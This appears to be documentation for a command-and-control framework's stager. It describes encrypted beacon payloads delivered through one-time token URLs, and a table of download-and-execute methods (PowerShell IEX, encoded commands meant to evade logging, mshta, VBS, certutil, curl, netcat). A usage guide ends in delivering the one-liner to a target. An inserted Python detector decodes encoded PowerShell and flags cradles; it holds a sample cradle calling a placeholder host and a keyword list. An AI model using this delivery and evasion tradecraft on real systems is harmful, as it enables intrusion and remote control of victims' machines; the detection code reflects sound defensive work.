Stager
The stager system lets you deliver beacons via a one-time token URL. The payload is compressed (GZip) and encrypted (AES-256-CBC) at rest; the decryption key is embedded only in the delivery one-liner.
Delivery methods
A single stager token generates all of these one-liners simultaneously:
| Method | How it works |
|---|---|
| PS IEX | PowerShell downloads the PS1 script and executes it in memory |
| PS EncodedCommand | Same as above, base64-encoded in UTF-16LE to bypass command-line logging |
| HTA (mshta) | VBScript wrapper that downloads and runs the Python beacon |
| VBS | Standalone .vbs that downloads and executes silently via pythonw |
| Python (Linux/Mac) | urllib + SSL bypass one-liner for python3 / python |
| curl / wget / sh | Shell one-liners for Unix targets |
| nc (raw TCP) | Netcat fallback with no HTTP layer |
| certutil | Windows LOLBin download (cmd.exe and PowerShell variants) |
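
For defenders, the PS EncodedCommand row has a direct counterpart: the base64 argument is still recorded in process-creation telemetry and decodes back to the original script. The sketch below is an added example, not code from this project; the indicator list, function names and the sample host and token are assumptions made for illustration.

```python
import base64
import re
import shlex

# Illustrative, non-exhaustive indicators of download-and-run content in decoded PowerShell.
CRADLE = re.compile(r"\biex\b|invoke-expression|downloadstring|net\.webclient|invoke-webrequest", re.I)
URL = re.compile(r"https?://", re.I)
POWERSHELL = {"powershell", "powershell.exe", "pwsh", "pwsh.exe"}
URL_LOLBINS = {"mshta", "mshta.exe", "certutil", "certutil.exe"}  # from the delivery table

def tokens_of(cmdline):
    try:
        return shlex.split(cmdline, posix=False)  # keep Windows backslashes intact
    except ValueError:  # unbalanced quotes: fall back to whitespace splitting
        return cmdline.split()

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent or undecodable."""
    toks = tokens_of(cmdline)
    for i, tok in enumerate(toks[:-1]):
        name = tok[1:].lower()
        # PowerShell accepts any prefix of -EncodedCommand (-e, -enc, ...) and the alias -ec.
        if tok[0] in "-/" and name and ("encodedcommand".startswith(name) or name == "ec"):
            try:
                return base64.b64decode(toks[i + 1].strip('"'), validate=True).decode("utf-16-le")
            except ValueError:  # covers bad base64 and bad UTF-16LE
                return None
    return None

def classify(cmdline):
    """Return findings for one process-creation command line."""
    toks = tokens_of(cmdline)
    image = toks[0].strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower() if toks else ""
    findings = []
    if image in POWERSHELL:
        script = decode_encoded_command(cmdline)
        if script is not None:
            findings.append("encoded-powershell")
            if CRADLE.search(script) and URL.search(script):
                findings.append("download-cradle")
    elif image in URL_LOLBINS and URL.search(cmdline):
        findings.append("lolbin-with-url")
    return findings

# Constructed samples (placeholder host and token), encoded as the table describes.
SCRIPT = "Invoke-Expression (Invoke-WebRequest 'https://stager.example.invalid/TOKEN').Content"
SAMPLE_PS = "powershell.exe -NoProfile -enc " + base64.b64encode(SCRIPT.encode("utf-16-le")).decode()
SAMPLE_MSHTA = "mshta.exe https://stager.example.invalid/TOKEN"
SAMPLE_BENIGN = r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"

if __name__ == "__main__":
    for line in (SAMPLE_PS, SAMPLE_MSHTA, SAMPLE_BENIGN):
        print(classify(line), line[:60])
```

Feed `classify` the command-line field from process-creation events; the decoded script from `decode_encoded_command` is what an analyst should review or store alongside the alert.
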
Token settings
- Max uses — limit how many times the token can be redeemed (e.g. `1` for single use)
- Expiry time — the token self-destructs after this datetime
- Revoke — invalidate any token immediately from the panel
Using the stager
- Go to Stager in the sidebar
- Paste the beacon source code (or generate one first from the Beacon Generator)
- Set max uses and expiry
- Click Create — a token URL is generated
- Copy the desired one-liner and deliver it to the target
- Stager tokens bypass the IP whitelist by design — they are meant to be used from target machines
- The payload is never stored in plaintext; the AES key is only in the delivery one-liner
- Tokens can be revoked at any time even if the max-use limit has not been reached